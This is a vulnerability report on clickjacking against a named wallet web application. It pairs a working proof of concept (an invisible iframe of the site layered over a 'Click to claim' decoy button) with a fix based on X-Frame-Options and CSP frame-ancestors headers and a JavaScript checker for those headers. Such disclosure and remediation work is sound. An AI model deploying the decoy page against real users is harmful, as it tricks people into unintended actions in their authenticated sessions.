Vulnerability: Click-Jacking
Description: The application can be loaded inside an iframe on an attacker-controlled page. With that frame set to 0% opacity and positioned over decoy content, the victim does not realize they are clicking or typing into the application: their own authenticated browser performs the actions the attacker's page lines up under the cursor.
"Clickjacking" (a subset of "UI redressing") is a malicious technique that deceives a web user into interacting (in most cases by clicking) with something different from what they believe they are interacting with. It can be used alone or in combination with other attacks, and can cause the victim to send unauthorized commands or reveal confidential information while apparently interacting with a harmless web page.
Vulnerable Application: WalletWebserver https://www.myfusionwallet.com
Steps to Reproduce:
1- Use an online clickjacking tester such as https://www.lookout.net/test/clickjack.html: if the target renders inside the test page's frame, it is frameable.
Or place the iframe below in any attacker-controlled page (a local HTML file is enough) and open it in a browser:
```html
<iframe id="frame" width="100%" height="100%" src="https://www.myfusionwallet.com/"></iframe>
```
Screenshot:
Fix: Send X-Frame-Options: DENY on every HTML response, or SAMEORIGIN if the application legitimately frames its own pages (note that SAMEORIGIN lets any page on the same origin frame it). Add Content-Security-Policy: frame-ancestors 'none' (or 'self') as well: browsers that support it prefer it over X-Frame-Options, and it can list specific trusted origins, which X-Frame-Options cannot do in current browsers (ALLOW-FROM is ignored). After deploying, verify the headers on a page that carries sensitive actions, not only the landing page.
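The two halves of this report, the reproduction (a transparent frame over a decoy) and the fix (framing headers), as one added example. This is illustrative code written for this issue, not code from the reporter or from the WalletWebserver project. `buildClickjackPoc` generates the decoy page with the 0-opacity iframe; `framingDecision` applies the browser rules for X-Frame-Options and CSP frame-ancestors to a set of response headers so you can tell whether a given ancestor origin could frame the page. The header sets at the bottom are constructed for the demo, not captured from the target, and the frame-ancestors matcher is simplified (scheme-only sources, `'self'`, `'none'`, `*`, and host sources with an optional `*.` wildcard and port).

```javascript
// Added example for this issue: clickjacking PoC page + framing-header evaluator.
const TARGET = "https://www.myfusionwallet.com/"; // URL from the report

// Decoy page: a visible button the victim thinks they click, with the target
// application stacked above it at opacity 0 so the real click lands in the frame.
function buildClickjackPoc(targetUrl) {
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Claim your prize</title>
<style>
  body { margin: 0; }
  #decoy  { position: absolute; top: 300px; left: 200px; padding: 20px; z-index: 1; }
  #target { position: absolute; top: 0; left: 0; width: 1200px; height: 900px;
            opacity: 0; z-index: 2; border: 0; }   /* invisible, but on top */
</style></head>
<body>
  <button id="decoy">Click to claim</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// Normalise "https://Host:port/path" to its origin string.
function originOf(url) { const u = new URL(url); return `${u.protocol}//${u.host}`; }

// Match one frame-ancestors source expression against a candidate ancestor origin.
function sourceMatches(src, pageOrigin, ancestorOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "*") return true;
  if (s === "'self'") return pageOrigin === ancestorOrigin;
  const anc = new URL(ancestorOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return anc.protocol === s;      // e.g. "https:"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(s);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  if (scheme && anc.protocol !== scheme + ":") return false;
  const hostOk = wild ? anc.hostname.endsWith("." + host) : anc.hostname === host;
  if (!hostOk) return false;
  if (port && port !== "*") {
    const ancPort = anc.port || (anc.protocol === "https:" ? "443" : "80");
    return ancPort === port;
  }
  return true;
}

// Would a browser let `ancestorOrigin` frame a page from `pageOrigin` served with
// these headers? frame-ancestors, when present, takes precedence over
// X-Frame-Options. Header names are matched case-insensitively.
function framingDecision(headers, pageOrigin, ancestorOrigin) {
  pageOrigin = originOf(pageOrigin);
  ancestorOrigin = originOf(ancestorOrigin);
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);            // empty list == 'none'
      const allowed = sources.some(src => sourceMatches(src, pageOrigin, ancestorOrigin));
      return { frameable: allowed, reason: `CSP ${directive}` };
    }
  }
  const xfo = h["x-frame-options"];
  if (xfo) {
    // The header may carry several comma-separated values; per the HTML spec,
    // conflicting values alongside DENY/SAMEORIGIN are treated as a block.
    const values = [...new Set(xfo.split(",").map(v => v.trim().toLowerCase()))];
    if (values.length > 1 && (values.includes("deny") || values.includes("sameorigin")))
      return { frameable: false, reason: `X-Frame-Options conflicting values: ${xfo}` };
    if (values[0] === "deny") return { frameable: false, reason: "X-Frame-Options: DENY" };
    if (values[0] === "sameorigin")
      return { frameable: pageOrigin === ancestorOrigin, reason: "X-Frame-Options: SAMEORIGIN" };
    // ALLOW-FROM and unknown tokens are ignored by current browsers: no protection.
    return { frameable: true, reason: `X-Frame-Options ignored by browsers: ${xfo}` };
  }
  return { frameable: true, reason: "no X-Frame-Options and no frame-ancestors" };
}

// Constructed header sets for the demo (not captured from the target).
const NO_PROTECTION = { "Content-Type": "text/html" };
const FIXED = { "X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'" };
console.log(framingDecision(NO_PROTECTION, TARGET, "https://evil.example"));
console.log(framingDecision(FIXED, TARGET, "https://evil.example"));
console.log(buildClickjackPoc(TARGET).length, "bytes of PoC HTML");
```

To use the evaluator against a live site, capture the response headers of a page with sensitive actions (for example with your browser's network panel or a HEAD request) and pass them in as the `headers` object; the PoC string can be written to a local `.html` file and opened in a browser to reproduce the overlay described in the steps above.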
Reference: https://www.owasp.org/index.php/Clickjacking